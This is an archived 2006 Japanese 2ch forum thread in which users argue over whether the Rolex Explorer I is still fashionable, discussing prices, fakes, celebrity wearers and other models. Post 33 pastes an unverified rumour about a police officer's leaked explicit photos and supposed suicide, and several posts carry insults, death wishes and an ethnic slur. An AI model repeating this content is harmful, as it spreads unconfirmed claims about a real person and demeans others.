5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ロレックス エクスプローラー1って、すでに下火??2

1 :くりぃむしゅー:2006/10/09(月) 22:41:29
最近買ったんだけど、周囲から


「おお、キムタクが前(まぇ〜)にしてたやつね」
「懐っ!それ流行ったよなァ〜」
「あ、それロレックスなんだ、ちっちゃいね」


などと言われ、若干傷ついている
下火でも、ブームに逆行してても、所詮ステンレスでも何でもいいんだけどね
実際どうよ?


前スレ
ロレックス エクスプローラー1って、すでに下火??
http://hobby8.2ch.net/test/read.cgi/watch/1157813125/

2 :Cal.7743:2006/10/09(月) 22:44:12
2げえ
 


3 :Cal.7743:2006/10/09(月) 23:00:42
3ゲト

4 :Cal.7743:2006/10/09(月) 23:12:37
     

5 :Cal.7743:2006/10/09(月) 23:18:30
新スレいらねーだろ
>>1
死ね

6 :Cal.7743:2006/10/10(火) 02:47:48


7 :Cal.7743:2006/10/10(火) 12:17:48
>>5
じゃ、削除依頼よろしく

8 :Cal.7743:2006/10/10(火) 17:19:21
 

9 :Cal.7743:2006/10/10(火) 18:15:30
新スレおめ!

10 :Cal.7743:2006/10/10(火) 21:57:10
 

11 :Cal.7743:2006/10/10(火) 22:08:16
 

12 :Cal.7743:2006/10/10(火) 22:28:18
シンプルで使いやすい時計だしいいじゃん


ただ希少性とかはかなり落ちたはず
最近は正規並行問わずフツーに店にも並んでるし。

店員さんもここんとこ入荷しやすくなったとか言ってた

13 :Cal.7743:2006/10/11(水) 08:12:05
中日優勝セール
正規Zばん 25万

14 :Cal.7743:2006/10/11(水) 21:51:55


15 :Cal.7743:2006/10/11(水) 23:55:24
 

16 :Cal.7743:2006/10/12(木) 00:34:16
雑誌「an・an」(マガジンハウス)が毎年行う「好きな男・嫌いな男」特集の「好きな男」アンケートで、
SMAPの木村拓哉(33)が13連覇を達成した。
11日発売の同誌によると「抱かれたい男」「恋人にしたい男」「おしゃれだと思う男」の3部門でも1位で、
合わせて4冠。これら3部門も昨年に続く首位。

 木村は10日、「自分でいいのか疑問はあるけど、選んでいただいた事実はしっかり受け止めたい」とコメント。
「抱かれたい男は照れる。みんな本当は(抱かれたいと)思ってないでしょ」と赤面しながら話した。

 トヨタ新型カローラのCMキャラクターを務めることになり、
この日は都内で会見に出席。CMも単独で5社、SMAPとしての出演も含めると契約は計7社に。
会見は全国7カ所の大型ビジョンでも同時中継された


17 :Cal.7743:2006/10/12(木) 04:30:49
EXTはキムタク以外の芸能人もぎょうさんしとるけどEXUはなんでだあれも
しとらへんにゃ?

18 :Cal.7743:2006/10/12(木) 09:54:42
EX2の黒はアホの坂田師匠が、白はキャイーンのウドがはめてるらしいぞw

19 :17:2006/10/12(木) 18:32:11
なんでEXUはお笑い系なんや。お笑い系がはめてても流行らないな。。。

20 :Cal.7743:2006/10/13(金) 00:08:29

岩城滉一のロレじゃね?ww
http://ime.nu/59.106.37.26/VJ/label/ssv/main/img/LL00451.jpg



21 :Cal.7743:2006/10/13(金) 00:21:59
>>20
グロ

22 :Cal.7743:2006/10/13(金) 00:39:45
EX2
まぁ簡単に言うと

『2』

で特に白、TAG(7万円位)にしか見られない

痛ぁ〜いです

23 :Cal.7743:2006/10/13(金) 00:59:16
まぁぶっちゃけ1も
普通のひとには高い時計だとはうつらないよ

24 :Cal.7743:2006/10/13(金) 01:01:16
それはないなあ
普通の人にはロレックス=高い時計っていうイメージは健在です
別に自慢するつもりは更々ないし、むしろ放っておいてもらいたいがね

25 :Cal.7743:2006/10/13(金) 01:05:56
パチロレ最強
EX1が6千円だぜ

26 :Cal.7743:2006/10/13(金) 01:07:26
・・・よかったね

27 :Cal.7743:2006/10/13(金) 01:10:07
パチターノグラフホスィ
誰か特攻してくんない?

28 :Cal.7743:2006/10/13(金) 01:12:18
ターノと新型DJ迷ってDJ選んだから、君がターノ買ってくれ
本物をね

29 :Cal.7743:2006/10/13(金) 01:39:04
>24
時計なんもしらんほとんどの人はエクスプローラ1見ても2見ても
あるいはデイトナみてもすぐにロレとはわからない。
ロレックスが高級、っていうイメージはあってもどんなのがロレか
見分けつかん.


まぁちょっと知ってる人は>>22みたいな反応すると思う

30 :Cal.7743:2006/10/13(金) 01:41:42
>>29
ほとんどの人はロレックスぐらいは知ってるわけで、王冠マークを見たらロレックスだと思うわけだよ
または、高そうな時計してたら「それロレックス?」って訊いてくる可能性大
別にロレを持ち上げてるわけじゃないよ
本当にそうだから

31 :Cal.7743:2006/10/13(金) 01:55:06
>>29
パチスロ打ちに行ったとき隣の兄ちゃんロレジだった、間違い無いけど場違い感じた

32 :Cal.7743:2006/10/13(金) 02:02:58
>>30
>別にロレを持ち上げてるわけじゃないよ

うん それはわかるし俺もロレに抵抗感あるわけじゃないよ

ただ、実際ロレックス=王冠マークって知ってるひとも案外限られるし
エクスプローラ1見て「高そう」とか「それロレックスだな」とか
すぐわかる人も多くはない…かと。
田舎暮らしの俺の経験だけじゃなんとも一般化できないけど。


EX1自体はいい時計だと思うよ

33 :Cal.7743:2006/10/13(金) 06:02:01
M字開脚マンコ画像を日本中に晒された徳島県警少年課のMさんが自殺し
その死体が発見されたという未確認情報が、今、編集部に入った。
【プチバッチ!】は緊急速報を連続して配信しており、その中でマスコミ各
社が徳島県警からの「報道自粛要請」に従って、記事化を見合わせたり、
記事を削除したりした内幕を暴いている。
 マスコミが徳島県警の「要請」に屈したのは、Mさん自殺の可能性が極め
て高いからだ。
「Mさんの両親からマスコミ各社からの問い合わせが殺到。マンコ写真の話
を初めて知り、両親は卒倒したそうです。まさに人権蹂躙なのですが、恐ろ
しいのはこれからです。両親も連絡が取れず、本人の携帯に電話しても出ま
せん。絶対、これは自殺してますよ。ミクシィの責任は重大です」
 本誌は総力をあげてMさんの行方を追跡中。自殺説の真偽についても確認
作業をおこなっている。今回ばかりは、さすがの俺も気が重い。「うけけけ
け」という品性のカケラもない笑い声は自粛したいと思う。合掌!!

http://www.mailux.com/mm_bno_dsp.php?mm_id=MM3CA3323935BAC&bno=20061007225605

34 :Cal.7743:2006/10/13(金) 11:23:09
>>32
田舎を基準に話すなよ

35 :Cal.7743:2006/10/13(金) 13:55:28
ここので十分じゃね?
http://www.nsakura.com/index.htm

36 :Cal.7743:2006/10/13(金) 15:11:17
まぁ日本の大半は田舎だがな

37 :Cal.7743:2006/10/13(金) 18:30:37
ロレって着けていて得になる場面と損になる場面があるので気をつけないといけない
高級品ていうのは概してそういうもんだけどロレはメジャーだからね
良くも悪くも

38 :Cal.7743:2006/10/13(金) 20:44:45
ロレはともかく
キムタが髪切ってんじゃんかよぉ


39 :Cal.7743:2006/10/13(金) 20:53:54
キムタ左右の耳の形状違ってたのに治したの?

40 :Cal.7743:2006/10/13(金) 21:07:06
■お願い■最近ヤフーオークションのロレックスデイトナカテゴリーで
1円から3000000円、中には24000000円で偽物を大量出品している者がいます。
おかげで正直に出品しているデイトナを見つける事がとても困難になっています。
最近のヤフー新制度■違反商品の申告■というのを知っていますか。
画面中央上にありますが、ここから色々と違反申告ができます。
申告するとヤフーが削除してくれますし、削除したことをメールで教えてくれるので安心です。
ただし、出品者が故意に取り消しした場合もメール通知してくれますが取り消し出品をクリック
するとまた偽物出品しているので再度違反申告するというイタチゴッコです。
でもこの書き込みを見て一人でも違反申告に協力していただければ申告した分だけ出品者にも
ヤフーにもメールが届くので偽物が少なくなり本物のデイトナが見やすく、探しやすくなりますの
でどうかご協力をお願いしたましす。
私は暇があれば申告しています。すると同じ考えの方が結構おられてどんどん申告が増えています。


41 :Cal.7743:2006/10/13(金) 23:38:01
>>35
堂々とそんな商売してて許されるものなの?
ロレやパテックに通報したらどうなるだろう?

42 :Cal.7743:2006/10/14(土) 02:00:14
>>41
お前がしる
しない、出来ないのなら書くな

43 :Cal.7743:2006/10/14(土) 04:48:10
>>42
従兄弟が日ロレの中の人だから、言っておく。
出来ないのなら書かないが、出来るから書いた。悪いか?

44 :Cal.7743:2006/10/14(土) 13:45:10
>>43通報よろ
報告よろ

45 :Cal.7743:2006/10/14(土) 14:59:08
>43
四の五の言う前に通報しろ
本当にできるのならなw


46 :Cal.7743:2006/10/14(土) 15:04:01
バカ従兄弟が騒いでるよって通報しといたよ

47 :Cal.7743:2006/10/14(土) 16:59:34
店で買えば問題無いわな

48 :Cal.7743:2006/10/14(土) 17:02:35
速報

ヨーロッパ・アメリカ圏のロレックス定価が値上がり決定!
さらに円安為替の再到来で今後の値上がりは必至だとよ。

49 :Cal.7743:2006/10/14(土) 17:05:23
俺パチしか買わないし問題なしw

50 :Cal.7743:2006/10/14(土) 17:52:23
ようやく本来のEXP1の値打ちに落着いたと思ったら。。値上げか

51 :Cal.7743:2006/10/14(土) 21:02:07
買えない奴らがウザいね


52 :Cal.7743:2006/10/14(土) 23:11:20
なんだかんだ言ってもいいものはいいねー

http://nanasisan.com/0nanasi/src/up3868.jpg

53 :Cal.7743:2006/10/14(土) 23:40:02
パチロレワロス

54 :Cal.7743:2006/10/15(日) 00:33:49
53死ね

55 :Cal.7743:2006/10/15(日) 00:49:27
>>52
俺もそれ持ってる
6千円だった

56 :Cal.7743:2006/10/15(日) 02:38:18
インデックスの間隔が広すぎ
得意気にパチうpすんなよwww

57 :Cal.7743:2006/10/15(日) 16:21:25
まじめな質問です。
IWCマーク15とEX1買うならどちらがいいですか??
EX1に日付があれば即買いなんですが。
ロレの金魚鉢みたいな日付窓・・何とかならないかな〜

58 :Cal.7743:2006/10/15(日) 16:37:57
長く持つならどっちも厳しい。どちらも止めた方が...

59 :Cal.7743:2006/10/15(日) 16:38:37
>57
ドライバーとハンマーでトン!ですよ

60 :Cal.7743:2006/10/15(日) 21:45:23
EX1にデイト付いてたら不細工なんだろーな

61 :Cal.7743:2006/10/15(日) 22:15:51
>>58/59さん有難うございます。
しかし他には40前半でさりげなーく身に着ける
ねじ巻き時計を知らないのですよ!
サブやスピットは若すぎるしねー
とにかく、ロレの「金魚鉢」がじゃまなわけで・・・・・
あれがなければ選択肢も広がるのですが・・

62 :Cal.7743:2006/10/15(日) 22:28:49
あんなレンズはマイナスドライバーで小突けば簡単に取れちゃうから
おいらのEX2の白はやっちゃいましたよ(無い方がかなりイイよ)

63 :Cal.7743:2006/10/15(日) 23:46:37
>>61
デイト欲しいなら15買えばいいだろうが
無理してロレ買わなくてもいいだろ
EX1はデイトないからかっこいいんだよ、おっさん

64 :Cal.7743:2006/10/16(月) 10:04:35
レンズは無い方がいいよな
>>62にあるように、かなり簡単に取れるらしいけど
やる勇気はないんだよな・・・

65 :Cal.7743:2006/10/16(月) 10:22:48
レンズあろうがなかろうがEX1自体がアレな件について

66 :Cal.7743:2006/10/16(月) 10:27:23
あれってどう言う事?
恥ずかしい恥ずかしい恥ずかしい恥ずかしい時計だとはわかってるが。

67 :Cal.7743:2006/10/16(月) 11:31:01
EX1が恥ずかしい時計なら、ロレックス自体恥ずかしいよ
キモヲタって恥ずかしいね

68 :Cal.7743:2006/10/16(月) 12:16:00
地味だよこの時計
付けてても別になんとも思わん

69 :Cal.7743:2006/10/16(月) 13:57:11
>>57
セイコー5でいいじゃん!

70 :Cal.7743:2006/10/16(月) 18:54:16
付けてる本人はなんとも思わなくても
まわりから見るとアレな件について

71 :Cal.7743:2006/10/16(月) 20:30:36
70が出世出来ない件

72 :Cal.7743:2006/10/16(月) 20:59:04
恥ずかしい時計の代表

73 :Cal.7743:2006/10/16(月) 21:04:11
>>71
確かに70はだめだなw
なんとなく想像したよwww

74 :Cal.7743:2006/10/16(月) 21:12:33
ヨーロッパ・アメリカ圏はロレックス定価が引き上げが確定しました

75 :Cal.7743:2006/10/16(月) 21:16:28
女はね、「どれだけ守ってもらえるか」「どれだけ強い男か」
これが価値なんだよ男の。
ヤンキーのティーンエージャーなら、喧嘩だけだね。
大人になれば、それが「年収」「職業」「ステータス」に変わるだけ。
ヤンキーねーちゃんも、「まとも」な女の子も根源的には求めるものは同じ。

いい女を連れている男をよく観察してごらん。



76 :Cal.7743:2006/10/16(月) 21:42:15
>>75
不細工が必死だなw

77 :Cal.7743:2006/10/16(月) 21:44:16
こぴぺにまじれすかこわるい

78 :Cal.7743:2006/10/16(月) 22:41:00
だっふんだ

79 :Cal.7743:2006/10/16(月) 22:43:21
下火でも気にしないのさ。

80 :Cal.7743:2006/10/16(月) 22:44:01
まじれすにこぴぺにまじれすかこわるい

81 :Cal.7743:2006/10/16(月) 22:46:14
キムタク 
キモオタ 似てるwwwwwwww

82 :Cal.7743:2006/10/16(月) 22:57:18
いい女を連れている男をよく観察してごらん

83 :Cal.7743:2006/10/16(月) 23:11:30
>>81=キモオタな件について

84 :Cal.7743:2006/10/16(月) 23:21:12
http://www.giants.jp/G/player/2006_58.html

85 :Cal.7743:2006/10/16(月) 23:31:11
クリームパン買いに行ってくる

86 :Cal.7743:2006/10/17(火) 03:18:07
71・73
EX1 1本君が必死だなwww

87 :Cal.7743:2006/10/17(火) 11:18:30
↑そんなに僻むなよw

88 :Cal.7743:2006/10/17(火) 17:27:35
近所のスーパーの兄ちゃんがつけてるけど
小ぶりなんで日本人にも合うとおもった 

89 :Cal.7743:2006/10/17(火) 18:15:56
中村俊輔がたまにしてるよね。
以前バッチリ写ってた。
創価専用時計か?

90 :Cal.7743:2006/10/17(火) 18:16:49
創価専用時計?
どんな意味?

91 :Cal.7743:2006/10/17(火) 18:59:41
将軍様御用達のEX1
褒美品としても使用

92 :Cal.7743:2006/10/17(火) 19:03:24
>>90=
池田SGI(創価学会インターナショナル)信者乙

93 :Cal.7743:2006/10/17(火) 19:40:23
キムタクは終わってるから
俺はgショック!竹之内って感じ!

94 :Cal.7743:2006/10/17(火) 20:51:36
創価はカルトだ。
この時計も終わりだな。

95 :Cal.7743:2006/10/17(火) 22:24:29
中村ももっとましな時計すればいいのに。
あいつはサッカー馬鹿でいい意味で世間知らずだからな。

96 :Cal.7743:2006/10/19(木) 11:40:11
今時ロレックス事態ダサイだろー。

97 :Cal.7743:2006/10/19(木) 13:50:42
今時とか言ってる時点で・・・
定番って言葉も知らんのか

98 :Cal.7743:2006/10/19(木) 13:55:54
定番という言葉で満足できるなら、それでいいんじゃないの。
まともな時計好きには耐えられないダサさだけどね。

99 :Cal.7743:2006/10/19(木) 13:59:48
まともな時計好きってセンスないんだねえw


100 :Cal.7743:2006/10/19(木) 14:01:05
まともな時計好きじゃなくてよかったw

101 :Cal.7743:2006/10/19(木) 14:02:15
定番って茶髪女子高生のビトンみたいなもんだろ

102 ::2006/10/19(木) 14:03:00
茶髪女子高生が抱きたくて仕方がないけど相手にされないキモヲタw

103 :Cal.7743:2006/10/19(木) 14:05:22
オーナーらしい貧困な発想ですねw

104 :Cal.7743:2006/10/19(木) 14:18:32
持ってないなら他所へ行けよw

105 :Cal.7743:2006/10/19(木) 14:25:14
>>104
スレタイ読めないバカはくるなw

106 :Cal.7743:2006/10/19(木) 14:29:51
持ってもないのに語れる内容か?w

107 :Cal.7743:2006/10/19(木) 14:32:08
だからスレタイ読めっているだろ。
すでに下火かどうかを語るスレだ。オーナーの意見などどうでもいいの。

108 :Cal.7743:2006/10/19(木) 14:32:11
いるんだよねえ
持ってもいないのに、薀蓄語る奴(苦笑)
まず所持してから話題に加われと

109 :Cal.7743:2006/10/19(木) 14:32:41
下火かどうかって時計雑誌が決めてるだけだろw

110 :Cal.7743:2006/10/19(木) 14:33:35
下火かどうか語ること自体痛い時計だってまだわからない馬鹿がいるのかw

111 :Cal.7743:2006/10/19(木) 14:33:45
誰が薀蓄語ってるの?

112 :Cal.7743:2006/10/19(木) 14:37:35
つか貰ってもいらない時計だしな。

113 :Cal.7743:2006/10/19(木) 14:38:23
下火だって誰が言ってるの?
持ってない時計が流行ってるかどうかなんて関係ないんじゃないの?

持ってる奴か買おうとしてる奴以外には関係ない話題だよね

114 :Cal.7743:2006/10/19(木) 14:38:52
>>112
誰にも貰えないから安心しなよw

115 :Cal.7743:2006/10/19(木) 14:39:30
市場価格が下がってるから前より下火とは言えるだろう。

116 :Cal.7743:2006/10/19(木) 14:40:28
生産数が増えて供給量が増しただけ
人気とは無関係

117 :Cal.7743:2006/10/19(木) 14:42:26
ソースなしに断言されてもねえ。関係者?

118 :Cal.7743:2006/10/19(木) 16:34:04
生産数なんて増えてないだろ
売れなくなったから不良在庫が増えただけ

119 :Cal.7743:2006/10/19(木) 17:37:30
>>118
価格comでは一番売れてるみたいだけど。

120 :Cal.7743:2006/10/19(木) 18:04:09
一般大衆から見るとサブとEXP1ってどっちが値段高そうに見られるかな?



121 :Cal.7743:2006/10/19(木) 18:26:55
価格comなんていかにもEXとか必死で買うやつが見てそうだw
で、買った後にこれって本物ですか?とか聞いてそう
もうね、アホかと

122 :Cal.7743:2006/10/19(木) 18:37:45
国内市場でだぶついてきたのは事実だろ。
価格はうそをつかない。

123 :Cal.7743:2006/10/19(木) 18:46:36
いまどき、エクスプローラー1してたら、なんかはずかしくない?
昔は、見てみてって感じだったけど、今ではわざと見えないように、
袖を下げたりしたくなるよね。

124 :Cal.7743:2006/10/19(木) 23:47:26
>>昔は、見てみてって感じだった
お前ダサすぎ。www

125 :Cal.7743:2006/10/19(木) 23:49:28
>>123
昔も今も君は下火ですね。
時計がダサいんじゃなくてつけてる本人がダサいだけじゃん。

126 :Cal.7743:2006/10/19(木) 23:51:39
まあブームの時にプレ値で買ったヤシってのはそんな感じなんだろうなw

127 :Cal.7743:2006/10/19(木) 23:51:57
そういじめてやるなよ!時計は持ち主選べないんだからさ。

128 :Cal.7743:2006/10/19(木) 23:55:33
>>126
そうだね
丁度今のデイトナみたいだね

129 :Cal.7743:2006/10/19(木) 23:58:04
なんか今のデイトナって暴騰してるね
数年前じゃ考えられない値段になってる

130 :Cal.7743:2006/10/20(金) 00:01:43
デイトナ人気はいつまで続くのやら。。。

131 :Cal.7743:2006/10/20(金) 00:03:28
馬鹿ばっかりだなw

132 :Cal.7743:2006/10/20(金) 00:07:03
価格comでは一番人気w
http://kakaku.com/bbs/Main.asp?PrdKey=51609010075

133 :Cal.7743:2006/10/20(金) 00:07:20
世の中の9割は馬鹿だからな

134 :Cal.7743:2006/10/20(金) 00:08:33
需要に対して供給が追いついてないだけだからなデイトナちゃんは。
むしろそれが時計産業の意図だろうけどな。
バカが欲しがる限り永遠に続くし、利口者が増えればあっというまにバブルは崩壊する。
すなわちEXP1をキムタクは填めてただけで、需要が高まったのは日本にミーハーなザコが
複数点在していたに他ならない。
という事で日本人は俺以外低脳
ぎゃはははははははははwwwwwwwwwwwwwwwwwww

135 :Cal.7743:2006/10/20(金) 00:10:09
133がすごくいいこと言った!一割の人ですね?同志よっ!

136 :Cal.7743:2006/10/20(金) 00:26:56
馬鹿だからEX1とデイトナ持ってます。。。

137 :Cal.7743:2006/10/20(金) 00:36:02
趣味は悪いけど、バカかどうかはわからない。

138 :Cal.7743:2006/10/20(金) 01:11:25
>>123が恥ずかしい時計だから袖で隠して

じゃあ、まだしてる件
ハズいと言う前にすんな

139 :Cal.7743:2006/10/20(金) 01:15:24
>>134が高脳?
『デイトナちゃん』
ちゃん?
頭に蛆蟲湧いてる件

プレ値付く前の1016やデイトナを10本ずつ位仕入れて1000万位儲けたなら凄い蛆で俺ホシス

140 :Cal.7743:2006/10/20(金) 01:18:06
下火で恥ずかしいと思う時計のスレに出没して書き込みしてる奴ってw

141 :Cal.7743:2006/10/20(金) 01:21:57
EX1ロレ好きなら普通1本は持ってるだろ?オールマイティーに使えていいよ。デザイン飽きないし。人の時計の悪口言う奴は所詮その程度。
本人が一番わかってる。使えば使うほど味が出る一本だな!

142 :Cal.7743:2006/10/20(金) 06:55:18
>>141
IWCの前のインジュニアはどうなんでしょうか?
デザインといい機能といい、防水性能はEX1を上回ってますが。

143 :Cal.7743:2006/10/20(金) 07:03:03
>>142
値段も大きく上回ってetaぽんだけど
気に入ってるならいいんじゃないか。

144 :142:2006/10/20(金) 09:52:21
>>143
いや、だから前のルクルトムーブ搭載のやつですよ。
値段もあの当時の並行実売価格はEX1の実売価格と変らなかったと思います。

145 :Cal.7743:2006/10/20(金) 10:28:19
>141
ロレ好きならそれでいいよ
キムタクとか関係ないし
問題は別にロレ好きでも無いのに
ブームのときにプレ値で買って
今イラネって売却して中古相場を
暴落させてるミーハー共だ

146 :Cal.7743:2006/10/20(金) 11:16:47
>>144
デザインが好きならいいんじゃない
俺はいらないけど

147 :Cal.7743:2006/10/20(金) 12:54:30
おれのエクスプローラは26万で売れた
いい時に売れたのでヨカタ

148 :Cal.7743:2006/10/20(金) 13:55:50
未だにこれだけ話題になり多くのアンチ野郎がいる時計が下火に思えるかい?けなしてる奴ら時計持ってるのか?まさかカシオやシチズンじゃないだろうな!

149 :Cal.7743:2006/10/20(金) 14:03:17
そのまさかだから気にすんなよ

150 :Cal.7743:2006/10/20(金) 15:21:17
オレモソウオモタ

151 :Cal.7743:2006/10/20(金) 19:46:46
時計板の住人が結論の無い不毛な言い争いを延々
続ける理由は?(一つのみ選択)

1.意外と平均年齢低いから。
2.意外と世間知らずが多いから。
3.意外とネット初心者が多いから。
3.意外と暇な奴が多いから。
4.意外と上記全て
5.その他(理由)


152 :Cal.7743:2006/10/20(金) 21:54:02
言い争いの対象が半ば虚構の値打ちの代物だから。

153 :Cal.7743:2006/10/20(金) 23:31:27
下火と言うよりも今の価格が適正価格なのではなかろうか。
個人的にはシンプルで服装を選ばない実に良い時計だと思うのだが
一時期の価格の急騰っぷりは行きすぎだw
ロレックスと言うか、高級時計の定価ベースが全体的に上がるようだし
その前に購入しておこうかなと思う。しかしその前にロレジウムも欲しい。
ぶっちゃげグリーンサブも実に個性的でぜひ1本ほしい。
でも全部買う予算なんてない。

結局のところ値上げ前に全部揃えるのは不可能なようです。

154 :Cal.7743:2006/10/20(金) 23:35:49
だな!亀や茶店先週よりも8千円から1万値上がりしてるみたいだな、どのモデルも。
来年1月以降の値上げ前に買うべきだな。

155 :Cal.7743:2006/10/20(金) 23:54:29
>>154
あと1年情報が早ければ全部なんとかなったかもしれんのだがねえ…
俺は年内にロレジウムだけはなんとか入手しよう。

156 :Cal.7743:2006/10/20(金) 23:56:01
金持ちだね!俺もロレジウムほしー

157 :Cal.7743:2006/10/21(土) 00:05:34
金持ちじゃないよ!金持ちだったら全部買ってるよw

なけなしの貯金の一部切り崩して、プラス冬のボーナス突っ込んでなんとか…w

158 :Cal.7743:2006/10/21(土) 00:11:54
ロレジウム業界でもうけがいいよな!まさにセレブ。

159 :Cal.7743:2006/10/21(土) 00:24:18


    / ̄ ̄ ̄ ̄\      言っておくけど俺はイケテル男だよ。
   (  人____)     多分、俺に実際に会ったら、君らは俺を
    |ミ/  ー◎-◎-)    オタクとは思わないだろうね。
   (6     (_ _) )    家のPCは最近流行のFMVを使ってるし。
  _| ∴ ノ  3 ノ    服はユニクロを愛用してるぜ。
 (__/\_____ノ
 / (   ||      ||     時計は、金持ちが使う機械式やGSクォーツとは一味
[]__| |CASIO  ヽ    違ってて、最先端のソーラー電波式のカシオ時計を使ってるぜ!
|[] |__|__ ___)   まあ、周りに流されてるだけの時代遅れの金持ちが
 \_(__)三三三[□]三)   してる機械式やGSクォーツ時計ではないわけだ。
  /(_)\::::::::::::::::::::::::::|   オシアナス付けてコンサート会場に行ったりすると
 |よどばし|::::::::/::::::::/    女の子から、キャー素敵!って声が飛び交うしな。
 (_____):::::/::::::::/     モテモテ男になった感じだ。
     (___[]_[]    セレブとも言うかな?





160 :Cal.7743:2006/10/21(土) 00:40:26
ぜんぜん関係ないのだが、かなり笑ったので
http://www.youtube.com/watch?v=LIhbap3FlGc&eurl=




161 :Cal.7743:2006/10/21(土) 11:07:39
ださい時計

162 ::2006/10/21(土) 11:55:53
ださい奴

163 ::2006/10/21(土) 11:58:19
時計もダサいが顔もダサい

164 :Cal.7743:2006/10/21(土) 12:02:47
中身エアキング程度だべ!

165 :Cal.7743:2006/10/21(土) 12:03:57
程度っていうか同じ

166 :Cal.7743:2006/10/21(土) 12:05:02
じゃあエアキンのほうがええやん
カラバリあるし

167 :Cal.7743:2006/10/21(土) 12:05:34
このダサい時計のどこに魅力を感じるか不思議だ
シンプルで飽きないとかいう前に、見た目がつまんなすぎて買う気おきねーだろ普通w

168 :Cal.7743:2006/10/21(土) 12:06:23
いいと思うならエアキン買えばいい

でもあの文字盤が好きなんだよ

169 :Cal.7743:2006/10/21(土) 12:07:13
>>167
普通の時計相手に必死ですね(苦笑)

170 :Cal.7743:2006/10/21(土) 15:19:28
サブやGMTは叩かれなく、EX1だけが叩かれてる。














EX1は糞、持ってるやつ負け組

171 :Cal.7743:2006/10/21(土) 16:00:50
そういや現行EX1は1016からのモデルチェンジ直後から叩かれてて不人気だったよな。
今持ってるヤシはキムタク意識して買ったと思われても仕方ない

172 :Cal.7743:2006/10/21(土) 16:09:50
デザインが好きとかシンプルで良いとか軽いとかオールマイティーとか安いとか飽きないとか

ミーハーですってはっきり言えよw

173 :Cal.7743:2006/10/21(土) 16:27:23
>>170-172
EX1が気になって仕方がないご様子

本当に糞な物には興味湧かないからねw

174 :Cal.7743:2006/10/21(土) 16:39:05
>>173
170はともかく171,172は当たってるかも

175 :Cal.7743:2006/10/21(土) 19:44:07
キチガイ的値段時計

176 :Cal.7743:2006/10/21(土) 20:20:16
オメガのことか

177 :Cal.7743:2006/10/23(月) 02:08:57
EXUってどうよ?

178 :Cal.7743:2006/10/23(月) 02:14:50
EXUだったらGMTマスターU買う

179 :Cal.7743:2006/10/23(月) 07:56:34
GMTUならサブ買う。

180 :Cal.7743:2006/10/23(月) 08:00:08
サブならシード買う。

181 :Cal.7743:2006/10/23(月) 08:00:55
シードならロレジウム買う。

182 :Cal.7743:2006/10/23(月) 08:01:43
ロレジウムならデイトナ買う。

183 :Cal.7743:2006/10/23(月) 08:04:12
デイトナなら1665シード買う。

184 :Cal.7743:2006/10/23(月) 08:09:44
1665シードなら手巻きデイトナ買う。

185 :Cal.7743:2006/10/23(月) 09:02:51
ロレ好きなら手巻きはコスモと言ってチョ

186 :Cal.7743:2006/10/23(月) 20:15:27
手巻デイトナ買うなら1016のR番買う。

187 :Cal.7743:2006/10/23(月) 21:55:19
1016はもう持ってるから手巻きデイトナ買う。

188 :Cal.7743:2006/10/23(月) 22:09:07
スペースドゥエラー

189 :Cal.7743:2006/10/23(月) 22:36:51
手巻きデイトナならデイトジャスト10個買う。

190 :Cal.7743:2006/10/23(月) 23:00:57
そんなにDJいらないw
でも新型の黒と黒銀と銀の3個買いだったらしたいかも

191 :Cal.7743:2006/10/24(火) 00:44:08
YO!YO!YO!オマエラYO!
DJ カモンYO!YO!YO!

192 :Cal.7743:2006/10/24(火) 00:47:42
put your hands in the air

193 :Cal.7743:2006/10/24(火) 16:02:22
定年退職後も使えるロレのモデル教えて下さい?スポーツモデル老人がつけてても違和感ないですか?

194 :Cal.7743:2006/10/24(火) 17:30:15
マルチしてると叩かれるよ

今いくつよ?
じじいならデイトジャスト買え

195 :Cal.7743:2006/10/25(水) 18:44:16
素直に114270買って一生涯着けてる方が格好いーんじゃないの?

俺は114270と14060Mを死ぬまで使う予定だね。。。

196 :Cal.7743:2006/10/25(水) 18:57:25
カッコよく年をとった自分を想像するヤツが多いが
実際にはしょぼくれたジジイになるってコトに気付いてない。
お前のまわりのいるくたびれたジジイが114270や14060Mつけてる姿を想像してみろ。
それが何十年か先のお前の姿だよ

197 :Cal.7743:2006/10/25(水) 20:04:10
このスレって不毛すぎ。下火に決まってるだろ。

198 :Cal.7743:2006/10/25(水) 21:22:31
木村に衝撃うけたやつかなりいるな この板

199 :Cal.7743:2006/10/25(水) 21:47:21
今日、コンビにのレジで俺の前でEX1着けてる(本物かパチか判らず)30代位の
サラリーマン風、兄ちゃんに遭遇したが革靴ぐらい磨いて外行けやw
サイフもショボイぞ!もし本物だったとしても、オマイじゃマジ本物に見えないな!

でも、これが典型的なEX1持ちの姿かも・・・な。

200 :Cal.7743:2006/10/25(水) 21:49:38
俺、家でジャージにEX1だけど。
もたったいないから、外には連れ出さないね!!
なんといっても! EX1だから!!

201 :Cal.7743:2006/10/25(水) 22:33:11
まあ 勿体ないわ 実用時計よ ガンガン使いなさい 振りまくりなさい

202 :Cal.7743:2006/10/25(水) 22:36:29
イヤヨー そんなこといっちゃ〜
もう〜 エッチなんだから!

203 :Cal.7743:2006/10/25(水) 23:56:09
いいだろー

204 :Cal.7743:2006/10/25(水) 23:59:29
そんな時こそイナバウアーですよ!!







そんな時こそイナバウアーですよ!! そんな時こそイナバウアーですよ!!







そんな時こそイナバウアーですよ!!

205 :Cal.7743:2006/10/28(土) 23:09:30
ロレックス今年一年間で市場に出た(売れた)ランキング
1位サブでイト
2位EX1
3位デイトジャスト
だそうだ。

206 :Cal.7743:2006/10/28(土) 23:16:39
あっそ

207 :Cal.7743:2006/10/28(土) 23:19:20
>>489
うPしろ

208 :Cal.7743:2006/10/28(土) 23:51:07
>>207
了解した。俺が489GETしたら何かUPするよ。

209 :Cal.7743:2006/10/29(日) 01:09:58
EX1渋谷楠に定期的に大量に出るね・・・とっくに終わってるだろ



210 :Cal.7743:2006/10/29(日) 01:12:04
終わってる時計は売れ残るけど、全部売り切れるから終わってるとは言わないね

211 :Cal.7743:2006/10/29(日) 01:24:28
渋谷の楠には地方の業者が仕入れに来てる
東京から地方へ伝播して やがて消えてくへたれ

212 :Cal.7743:2006/10/29(日) 09:15:49
中古の相場25万以下くらいになった?

213 :Cal.7743:2006/10/29(日) 09:17:15
さあ?

214 :Cal.7743:2006/10/29(日) 10:42:09
今、中古市場はひどいことになっとるで

215 :Cal.7743:2006/10/29(日) 12:06:24
有名芸能人が付けてると自分も欲しがる糞ザコミーハー日本猿のせいで
